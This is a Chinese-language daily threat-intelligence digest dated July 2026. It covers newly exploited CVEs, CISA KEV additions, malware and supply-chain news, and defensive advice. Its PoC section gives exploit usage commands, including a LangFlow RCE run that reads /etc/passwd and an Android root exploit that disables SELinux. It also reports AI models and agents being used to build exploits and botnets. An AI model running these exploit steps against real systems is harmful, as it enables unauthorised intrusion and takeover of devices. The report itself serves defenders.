每日安全情报报告
报告日期 :2026-07-16
覆盖周期 :2026-07-14 至 2026-07-16(近 48 小时)
风险等级 :🔴 高危
本期关键词:SonicWall 双零日 · 微软创纪录补丁日 · SAP NetWeaver 9.9 · AsyncAPI 供应链攻击 · Cursor 0-Day · GPT-5.6 漏洞链
风险摘要
近 48 小时内安全态势持续升温。CISA 于 7 月 14 日一次性新增 4 项 KEV(已知被利用漏洞),其中 SonicWall SMA1000 双零日 CVSS 10.0 SSRF 在野利用、微软 SharePoint/AD FS 两个零日同步在野利用。微软 7 月补丁日创历史记录修复 570+ 漏洞。SAP NetWeaver 曝出 CVSS 9.9 内存损坏漏洞。npm 生态遭 AsyncAPI 供应链攻击,Miasma RAT 通过 GitHub Actions pwn request 投递至 300 万周下载量包。Cursor AI 编辑器未修补 0-Day 允许恶意 Git 仓库自动执行代码。GPT-5.6 Sol Ultra 被证实仅从安全补丁即可构建完整 Chrome 漏洞利用链。
一、最新高危漏洞
1.1 🔴 CVE-2026-15409 --- SonicWall SMA1000 SSRF(在野利用 · CISA KEV)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-15409 |
| 漏洞类型 | 服务端请求伪造(SSRF) |
| 受影响组件 | SonicWall SMA1000 系列(型号 6210/7210/8200v) |
| CVSS 评分 | 10.0(Critical) |
| 在野利用 | ✅ 已确认,SonicWall 调查到多个利用案例 |
| CISA KEV | 2026-07-14 新增,截止日期 2026-07-17 |
| 修复版本 | Hotfix 12.4.3-03453 / 12.5.0-02835 |
远程未认证攻击者可通过 Work Place 接口发起 SSRF,让设备向攻击者控制的地址发出请求,可能导致内部网络探测或进一步攻击链。
1.2 🔴 CVE-2026-15410 --- SonicWall SMA1000 代码注入(在野利用 · CISA KEV)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-15410 |
| 漏洞类型 | 代码注入(OS Command Injection) |
| 受影响组件 | SonicWall SMA1000 Appliance Management Console (AMC) |
| CVSS 评分 | 7.2(High) |
| 在野利用 | ✅ 已确认 |
| CISA KEV | 2026-07-14 新增,截止日期 2026-07-17 |
认证后管理员可通过 Management Console 执行任意操作系统命令,与 CVE-2026-15409 组合可形成完整攻击链。
1.3 🔴 CVE-2026-56164 --- Microsoft SharePoint Server 权限提升(在野利用 · CISA KEV)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56164 |
| 漏洞类型 | 关键功能缺失认证(CWE-306) |
| 受影响组件 | Microsoft SharePoint Server |
| CVSS 评分 | 5.3(Medium,但在野利用风险极高) |
| 在野利用 | ✅ 已确认,微软 DART 在事件响应中发现 |
| CISA KEV | 2026-07-14 新增,截止日期 2026-07-17 |
未认证远程攻击者可通过网络提升权限。CISA 同时发布 SharePoint 加固公告,将此漏洞与 CVE-2026-32201、CVE-2026-45659 关联------攻击者可利用 SharePoint 三漏洞组合链实现 RCE + IIS 机器密钥窃取 + 补丁后持久化。
1.4 🔴 CVE-2026-56155 --- Microsoft AD FS 权限提升(在野利用 · CISA KEV)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56155 |
| 漏洞类型 | 访问控制粒度不足(CWE-1220) |
| 受影响组件 | Microsoft Active Directory Federation Services (AD FS) |
| CVSS 评分 | 7.8(High) |
| 在野利用 | ✅ 已确认,微软 DART 在事件响应中发现 |
| CISA KEV | 2026-07-14 新增,截止日期 2026-07-28 |
认证本地攻击者可提升至 AD FS 管理员权限。AD FS 是混合 Azure AD 和本地环境的身份联合基础设施,一旦被突破可横行整个身份信任链,攻击思路类似"黄金 SAML"。
1.5 🔴 CVE-2026-44747 --- SAP NetWeaver AS ABAP 内存损坏
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-44747 |
| 漏洞类型 | 内存损坏(Out-of-Bounds Write) |
| 受影响组件 | SAP NetWeaver Application Server ABAP(版本 7.22 至 9.20) |
| CVSS 评分 | 9.9(Critical) |
| 在野利用 | 暂无确认 |
| 修复 | SAP Security Note 3747367 |
低权限认证攻击者可利用内存管理逻辑错误造成内存损坏,潜在实现任意代码执行,跨信任边界完全妥协机密性、完整性和可用性。
1.6 🔴 CVE-2026-27690 --- SAP Approuter HTTP 请求走私
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-27690 |
| 漏洞类型 | HTTP 请求走私(Request Smuggling) |
| 受影响组件 | SAP Approuter(版本 < 20.10.0,非 Cloud Foundry 部署) |
| CVSS 评分 | 9.1(Critical) |
| 修复 | SAP Security Note 3720138 |
未认证远程攻击者可发送特制 HTTP 请求拦截或操纵用户响应,导致拒绝服务或信息泄露。
1.7 🟠 CVE-2026-55040 --- SharePoint JWT 认证绕过(Pwn2Own 链)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-55040 |
| 漏洞类型 | JWT 令牌验证绕过(Security Feature Bypass) |
| 受影响组件 | Microsoft SharePoint Server |
| CVSS 评分 | 9.1(Critical) |
| 在野利用 | 暂无确认,但为 Pwn2Own Berlin 预认证 RCE 链的前半段 |
| 修复状态 | JWT 绕过已修复;RCE 组件推迟至 8 月补丁日 |
Rapid7 在 Pwn2Own Berlin 中利用此漏洞实现未认证远程攻击者冒充任意 SharePoint 用户(仅需知道目标用户名或 SID),并与另一个 RCE 漏洞链接实现未认证 RCE。RCE 部分计划在 8 月补丁日修复,在此之前 SharePoint 处于"半暴露"状态。
1.8 🟠 CVE-2026-56190 --- Windows RDP 远程代码执行
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56190 |
| 漏洞类型 | 使用未初始化资源 |
| 受影响组件 | Windows Remote Desktop Protocol (RDP) |
| CVSS 评分 | 9.8(Critical) |
| 在野利用 | 暂无确认,但 RDP 漏洞历史武器化速度极快 |
| 蠕虫化风险 | 类似 BlueKeep(CVE-2019-0708),可蠕虫传播 |
未认证网络攻击者可通过 RDP 远程执行任意代码。RDP 是互联网上最广泛暴露的服务之一,也是勒索软件的主要初始访问向量。
1.9 🟠 CVE-2026-57092 --- Hyper-V VMSwitch 虚拟机逃逸
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-57092 |
| 漏洞类型 | Use-After-Free(CWE-416) |
| 受影响组件 | Windows VMSwitch(Hyper-V 虚拟网络) |
| CVSS 评分 | 9.9(Critical) |
| 在野利用 | 暂无确认,微软评级"Exploitation More Likely" |
| 影响范围 | Windows Server 2016--2025、Windows 10/11 Hyper-V 主机 |
低权限 VM 内部攻击者可跨越 VM 边界实现主机 SYSTEM 权限,对云服务提供商和多租户虚拟化环境构成严重威胁。
1.10 🟠 CVE-2026-56451 --- Siemens Opcenter X JWT 认证绕过
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-56451 |
| 漏洞类型 | JWT 算法验证绕过 |
| 受影响组件 | Siemens Opcenter X(V2604 之前所有版本) |
| CVSS 评分 | 10.0(Critical) |
| 在野利用 | 暂无确认 |
| 影响 | 制造执行系统(MES)完全接管 |
未认证远程攻击者可伪造任意 JWT 令牌绕过认证,影响生产计划、质量管理和供应链运营。
1.11 🟡 CVE-2026-50661 --- Windows BitLocker 物理绕过(零日 · 已公开 PoC)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-50661 |
| 漏洞类型 | 安全功能绕过 |
| 受影响组件 | Windows BitLocker |
| CVSS 评分 | 6.2(Medium) |
| 在野利用 | 暂无确认,但 PoC 代码已公开 |
| 修复 | 已在 7 月补丁日修复 |
物理攻击者可在恢复环境中绕过 BitLocker 全盘加密访问受保护数据。与此前 YellowKey(CVE-2026-45585)攻击思路类似。
1.12 微软 7 月 Patch Tuesday 概览
| 指标 | 数值 |
|---|---|
| 修复 CVE 总数 | ~570-622(史上最大单月发布) |
| Critical 级别 | 57-59 个 |
| 零日漏洞 | 3 个(2 个在野利用 + 1 个公开披露) |
| 在野利用零日 | CVE-2026-56164(SharePoint)、CVE-2026-56155(AD FS) |
| 公开披露零日 | CVE-2026-50661(BitLocker) |
| 其他严重漏洞 | CVE-2026-58644 SharePoint RCE、CVE-2026-58608 Print Spooler RCE |
二、最新漏洞 PoC
2.1 CVE-2026-6307 --- Chrome V8 JS-to-Wasm 类型混淆 RCE
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-6307 |
| 漏洞类型 | V8 引擎 JS-to-Wasm 类型混淆 |
| 影响范围 | Chrome 106-146(约 4 年版本),修复版本 ≥ 147.0.7727.101 |
| PoC 来源 | GitHub - 0xsha/CVE-2026-6307 |
| 技术分析 | Nebula Security - Longinus |
漏洞原理 :JSToWasmFrameStateFunctionInfo 的等号运算符省略了 Wasm 签名比较,导致 CSE/GVN 合并了仅签名不同的帧状态。延迟反优化时将 Wasm i64 错误物化为 tagged externref(反之亦然),产生非笼子压缩的 64 位 addrof/fakeobj 原语。
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/0xsha/CVE-2026-6307.git
cd CVE-2026-6307
# 2. Flag-free 原语测试(无需特殊 flags,在 Chrome 146 上运行)
# 启动 HTTP 服务器
python3 -m http.server 8080
# 3. 在 Chrome 146 中访问以下页面:
# http://127.0.0.1:8080/flag-free/00-reachability-flagfree.html # 触发混淆状态
# http://127.0.0.1:8080/flag-free/01-primitives-flagfree.html # addrof/fakeobj
# http://127.0.0.1:8080/flag-free/02-store-flagfree.html # 越笼存储
# http://127.0.0.1:8080/flag-free/03-arw-flagfree.html # 笼内读写
# 4. RCE 演示(需无 ASLR 实验环境)
cd rce-no-aslr/
./run.sh calc # 弹出 xcalc 计算器
./run.sh exit # strace 确认 exit(66)
技术亮点 :无需 --allow-natives-syntax flag 即可触发,所有地址运行时泄漏,无硬编码。另一个 PoC 仓库 J4ck3LSyN-Gen2/CVE-2026-6307-Longinus 提供了 YARA 检测规则。
2.2 CVE-2026-43499 --- GhostLock Linux 内核 Futex UAF 提权(OnePlus Bootloader 越狱)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-43499 |
| 漏洞类型 | Futex PI Use-After-Free |
| 影响范围 | Linux 内核 2.6.39 ~ 7.1(主线 7.1 已修复),Android GKI 6.12.x 仍受影响 |
| PoC 来源 | GitHub - JoinChang/ghostlock-ace6t |
漏洞原理 :pselect6 系统调用将 fd_set 数据复制到内核栈。与 futex PI 等待机制结合时,已释放的栈帧可被回收为 rt_mutex_waiter 结构。PI 链遍历时的红黑树重平衡将受控值写入任意内核地址。
利用效果 :在 OnePlus Ace 6T(Snapdragon 8s Elite,Android 16,内核 6.12.38)上验证成功,实现 root + KernelSU 安装,无需解锁 bootloader。
使用步骤:
bash
# 1. 克隆仓库
git clone https://github.com/JoinChang/ghostlock-ace6t.git
cd ghostlock-ace6t
# 2. 设置 NDK 路径并编译
NDK=/path/to/android-ndk
$NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android35-clang \
-O2 -Wall -Isrc -DTARGET_CONFIG_H="targets/ace6t/target.h" \
src/targets/ace6t/main.c src/targets/ace6t/util.c src/slide.c \
src/targets/ace6t/fops.c src/pipe.c src/root.c src/targets/ace6t/miniadb.c \
-o ghostlock -fPIE -pie -pthread
# 3. 推送到设备并执行
adb tcpip 5555
adb push ~/.android/adbkey /data/local/tmp/a/adbkey
adb push ghostlock /data/local/tmp/a/e && chmod 755 /data/local/tmp/a/e
# 4. 执行完整利用
/data/local/tmp/a/e # 完整利用(adb shell)
/data/local/tmp/a/e --bootstrap # 手机独立模式(app context)
/data/local/tmp/a/e --write1 # 仅禁用 SELinux
2.3 CVE-2026-47291 --- Windows HTTP.sys 远程代码执行(PoC 已公开)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-47291 |
| 漏洞类型 | 整数溢出导致堆溢出(Ring 0 内核级) |
| 影响范围 | Windows HTTP.sys(影响所有运行 IIS/HTTP 服务的 Windows 系统) |
| PoC 来源 | GitHub - omair2084/misc(研究员 @w3bd3vil 于 7/11 发布) |
漏洞原理 :攻击者发送带有特殊构造 Content-Length 或 Transfer-Encoding: chunked 头部的 HTTP 请求,HTTP.sys 在解析时做乘法/加法计算缓冲区大小,结果超过 uint32 最大值发生回绕,分配过小缓冲区。随后完整数据写入导致内核堆溢出,攻击者获得内核级写入原语,可劫持控制流获取 SYSTEM 权限。
风险:可安装持久化后门、Dump LSASS、横向移动、绕过 EDR、部署勒索软件。内核级触发不产生应用层异常日志。
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/omair2084/misc.git
cd misc
# 2. 查看 PoC 文件(Python 脚本)
# 当前 PoC 包含触发机制但可能不含完整武器化 exploit
# 3. 在隔离测试环境中运行
python3 http_sys_overflow_poc.py --target http://target:port
2.4 LegacyHive --- Windows ProfSvc 权限提升零日(PoC 已公开)
| 项目 | 详情 |
|---|---|
| 漏洞类型 | 用户配置文件服务任意 Hive 加载 |
| 影响范围 | Windows(未修复) |
| PoC 发布者 | 研究员 Chaotic Eclipse(aka Nightmare-Eclipse) |
| 发布时间 | 2026-07-15(微软 Patch Tuesday 后数小时) |
漏洞原理:标准用户可加载其他用户的注册表配置单元(Hive)。需要另一个标准用户凭据和第三个用户名(可以是管理员账户)。成功利用后可将目标用户 Hive 挂载到当前用户 classes root 中,实现权限提升。
PoC 说明:公开发布的版本已精简以防止直接武器化利用,原始漏洞不需要额外用户凭据。微软目前未修复此漏洞。
2.5 CVE-2026-0770 --- LangFlow 未认证 RCE(PoC 已公开)
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-0770 |
| 漏洞类型 | 不可信控制球面功能包含(CWE-829)/ 代码注入 |
| 影响范围 | Langflow(补丁前所有版本) |
| PoC 来源 | GitHub - Ez4rd1x1/CVE-2026-0770 |
漏洞原理 :/validate 端点的 exec_globals 参数未进行输入验证,攻击者可传入不可信全局环境,实现以 root 用户身份执行任意代码。
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/Ez4rd1x1/CVE-2026-0770.git
cd CVE-2026-0770
# 2. 执行漏洞利用
python3 exp_v3.py -t http://target:7860 -c "cat /etc/passwd"
# 3. 自动登录获取 token 后发送 payload
# 脚本会自动完成:登录 → 获取 token → 构造 payload → 发送请求 → 输出结果
三、网络安全最新文章
3.1 GPT-5.6 Sol Ultra 仅从安全补丁构建完整 Chrome 漏洞利用链
OpenAI 的 GPT-5.6 Sol Ultra 模型仅使用公开可用的安全补丁提交(diff/commit),独立构建了一个完整的、可工作的 Google Chrome 漏洞利用链。这标志着 AI 在漏洞发现和利用构建方面的能力达到新里程碑,也引发了对 AI 安全能力的双重思考------既能加速防御,也能加速攻击。
3.2 Cursor AI 编辑器未修补 0-Day:恶意 Git 仓库可自动执行 Windows 代码
AI 代码编辑器 Cursor(超过 700 万开发者使用)存在严重未修补漏洞:当在 Windows 上打开一个仓库时,如果项目根目录中存在名为 git.exe 的文件,Cursor 会自动运行它------无需点击、无需批准对话框、无任何警告。攻击者可借此以登录用户身份执行任意代码,访问源码、SSH 密钥和云令牌。Mindgard 于 2025 年 12 月报告该漏洞,7 个月后仍未修复。
3.3 AsyncAPI npm 供应链攻击:Miasma RAT 通过 GitHub Actions pwn request 投递
7 月 14 日,攻击者通过 GitHub Actions pull_request_target 漏洞(pwn request)入侵两个 AsyncAPI GitHub 仓库,利用项目自己的发布流水线发布了 5 个恶意 npm 包(周下载量超 300 万)。恶意代码在 require() 时触发而非安装时,因此 --ignore-scripts 无法防护。最终投递 Miasma RAT------一个 3.08 MB 模块化框架,支持 130+ 种凭据窃取、6 个独立 C2 通道、LAN 横向移动和 AI 编码助手投毒。
3.4 黑客使用 Gemini CLI 在 6 分钟内构建实时 C&C 僵尸网络
一个名为 "bandcampro" 的俄语威胁行为者武器化了 Google 的 Gemini CLI AI 代理,用于迁移、部署和操作一个实时的命令与控制(C&C)僵尸网络。整个构建过程仅耗时 6 分钟,包括自动搭建新的 C2 服务器。这表明 AI 代理正在大幅降低攻击门槛。
3.5 Claude for Chrome 漏洞:恶意扩展可读取 Gmail、Docs 和 Calendar
Manifold Security 披露 Anthropic 的 Claude for Chrome 浏览器扩展存在信任边界缺陷(与 ClaudeBleed 相关)。任何能在 claude.ai 上运行脚本的其他浏览器扩展仍可触发 Claude for Chrome 针对 Gmail、Google Docs 和 Calendar 的任务。尽管 Anthropic 在 5 月限制了任意提示路径并发布了 8 个后续版本,漏洞在 v1.0.80 中仍然可复现。
3.6 LabubaRAT:伪装为 NVIDIA 软件的 Rust 远控木马
Blackpoint Cyber 披露了一个此前未记录的基于 Rust 的远程访问木马 LabubaRAT,伪装为 NVIDIA 容器运行时(nvidia-sysruntime.exe)。具备主机分析、安全工具识别、文件传输、截图、流量代理等功能,支持 HTTPS、WebView2、DNS 隧道多种通信方式,以 MaaS 模式提供。
3.7 OkoBot 恶意软件框架:针对硬件钱包的助记词钓鱼
自 2025 年 4 月起活跃的 Windows 恶意软件框架 OkoBot 包含 SeedHunter 模块,专门窃取硬件钱包恢复短语。该模块监视 Trezor Suite、Ledger Wallet 和 Ledger Live 应用程序,在真实钱包应用内部注入恶意页面。携带 20+ 个 payload,受害者遍布 25+ 个国家。
3.8 TuxBot v3:LLM 辅助开发的 IoT 僵尸网络框架
Palo Alto Networks Unit 42 披露了一个此前未报告的 IoT 像尸网络框架 TuxBot v3 Evolution,该框架显示出由大语言模型辅助开发的迹象。AI 生成的代码中包含了开发者未删除的安全免责声明,多个函数无法正常工作。支持跨架构编译(ARM/MIPS/x86_64/PowerPC/RISC-V)。
3.9 RabbitMQ 漏洞可泄露 OAuth 密钥并暴露跨租户队列元数据
Miggo 安全团队发现影响 RabbitMQ 消息代理服务的两个访问控制漏洞:漏洞一可将 broker 的 OAuth 密钥泄露给未认证攻击者(单次请求即可),可能导致完整 broker 接管;漏洞二允许任何登录用户静默读取其他租户数据,绕过租户边界。两个漏洞自 2024 年初就存在于代码库中,影响 RabbitMQ 3.13.0+。
3.10 美国指控两家俄罗斯"防弹托管"公司帮助黑客窃取数千万美元
美国司法部在俄亥俄州北区公布起诉书,指控三名俄罗斯公民和两家总部位于俄罗斯的"防弹托管"公司帮助黑客窃取数千万美元。这些公司为勒索软件团伙、钓鱼操作和其他网络犯罪活动提供基础设施服务。
3.11 Firefox 和 Chrome 修复多个严重漏洞
Mozilla Firefox 152.0.6 修复了 CVE-2026-15718(WebAssembly 无效指针)和 CVE-2026-15719(Navigation 站点隔离),利用代码已公开但未发现野外攻击。Google Chrome 修复 15 个缺陷含 2 个严重 UAF(CVE-2026-15764、CVE-2026-15765,Ozone 组件),影响 Linux/ChromeOS/Fuchsia。
3.12 黑客滥用 Claude 共享聊天和 Google 广告部署 MacSync 窃取程序
威胁行为者劫持 Anthropic 的 Claude AI 平台共享聊天功能和 Google 广告,诱骗 Mac 用户感染自身,部署新型信息窃取恶意软件 MacSync。这是 AI 平台被滥用于恶意软件分发的新案例。
四、CISA KEV 动态
7 月 14 日新增(4 项)
| CVE | 产品 | 漏洞类型 | 截止日期 |
|---|---|---|---|
| CVE-2026-15409 | SonicWall SMA1000 | SSRF | 2026-07-17 |
| CVE-2026-15410 | SonicWall SMA1000 | 代码注入 | 2026-07-17 |
| CVE-2026-56164 | Microsoft SharePoint | 缺失认证 | 2026-07-17 |
| CVE-2026-56155 | Microsoft AD FS | 访问控制不足 | 2026-07-28 |
7 月 10 日新增(2 项)
| CVE | 产品 | 漏洞类型 | 截止日期 |
|---|---|---|---|
| CVE-2026-48939 | iCagenda | 文件上传 | 2026-07-13 |
| CVE-2026-56291 | Balbooa Forms | 文件上传 | 2026-07-13 |
7 月 7 日新增(3 项)
| CVE | 产品 | 漏洞类型 | 截止日期 |
|---|---|---|---|
| CVE-2026-48908 | JoomShaper SP Page Builder | 文件上传 | 已截止 |
| CVE-2026-55255 | Langflow | IDOR | 已截止 |
| CVE-2026-56290 | Joomlack Page Builder | 访问控制 | 已截止 |
五、风险态势总结
当前活跃在野利用 KEV(按紧急度排序)
| 优先级 | CVE | 产品 | 截止日期 | 状态 |
|---|---|---|---|---|
| 🔴 紧急 | CVE-2026-15409 | SonicWall SMA1000 SSRF | 2026-07-17 | 今日截止 |
| 🔴 紧急 | CVE-2026-15410 | SonicWall SMA1000 代码注入 | 2026-07-17 | 今日截止 |
| 🔴 紧急 | CVE-2026-56164 | Microsoft SharePoint | 2026-07-17 | 今日截止 |
| 🟠 高 | CVE-2026-56155 | Microsoft AD FS | 2026-07-28 | 12 天 |
| ⚠️ 逾期 | CVE-2026-48939 | iCagenda | 2026-07-13 | 已逾期 3 天 |
| ⚠️ 逾期 | CVE-2026-56291 | Balbooa Forms | 2026-07-13 | 已逾期 3 天 |
本期重点
- SonicWall SMA1000 双零日 CVSS 10.0:今日 KEV 截止,攻击链组合 SSRF + 代码注入可完全接管 VPN 网关设备
- 微软创纪录补丁日:570+ CVE 修复压力巨大,SharePoint/AD FS 两个在野利用零日优先级最高
- SharePoint 三漏洞组合链:CVE-2026-32201 + CVE-2026-45659 + CVE-2026-56164 → RCE + IIS 密钥窃取 + 持久化
- SAP NetWeaver CVSS 9.9:企业 ERP 核心基础设施内存损坏漏洞,可跨信任边界完全接管
- AsyncAPI npm 供应链攻击 :Miasma RAT 通过 pwn request 投递,
--ignore-scripts无效,SLSA provenance 验证通过 - Cursor 0-Day 未修补:恶意 Git 仓库可自动执行 Windows 代码,700 万开发者受影响
- GPT-5.6 构建 Chrome 漏洞链:AI 从安全补丁独立构建完整利用链,标志 AI 安全攻防新阶段
- Hyper-V VMSwitch 逃逸 CVSS 9.9:VM 可逃逸至主机 SYSTEM,云服务商和多租户环境最高风险
防御建议
- 立即修补:SonicWall SMA1000(今日 KEV 截止)、SharePoint CVE-2026-56164、AD FS CVE-2026-56155
- 审计 npm 依赖 :检查是否安装了 AsyncAPI 恶意版本,轮换所有暴露凭据,搜索
sync.js和.miasma持久化痕迹 - 加固 SharePoint:按 CISA 加固公告实施,检查 IIS 机器密钥是否泄露,审计异常 Site Member 活动
- 限制 RDP 暴露:CVE-2026-56190 可蠕虫化,互联网暴露的 RDP 服务应立即限制访问
- Hyper-V 环境加固:CVE-2026-57092 影响所有 Hyper-V 主机,优先修补云和多租户环境
- SAP 修补:优先应用 SAP Note 3747367(NetWeaver ABAP CVSS 9.9),审计 Commerce Cloud 是否残留默认 OAuth2 凭据
- AI 安全治理:GPT-5.6 漏洞链构建能力表明需要重新评估 AI 安全治理框架,Cursor 0-Day 提示 AI 编码工具自身也是攻击面
- 对所有 PoC 代码保持警惕:ChocoPoC RAT 仍通过伪造 GitHub PoC 仓库攻击安全研究人员,仅在隔离环境中执行
六、参考来源
- CISA KEV 目录
- MSRC 7 月安全更新
- SonicWall PSIRT
- SAP 7 月安全公告
- The Hacker News
- CybersecurityNews
- BleepingComputer
- FreeBuf
- Datadog Security Labs
- StepSecurity
- Rapid7
- Tenable
- NVD
- GitHub Security Advisories
免责声明:本报告仅供安全研究和防御参考。所有漏洞利用信息来源于公开渠道,请在合法授权范围内使用。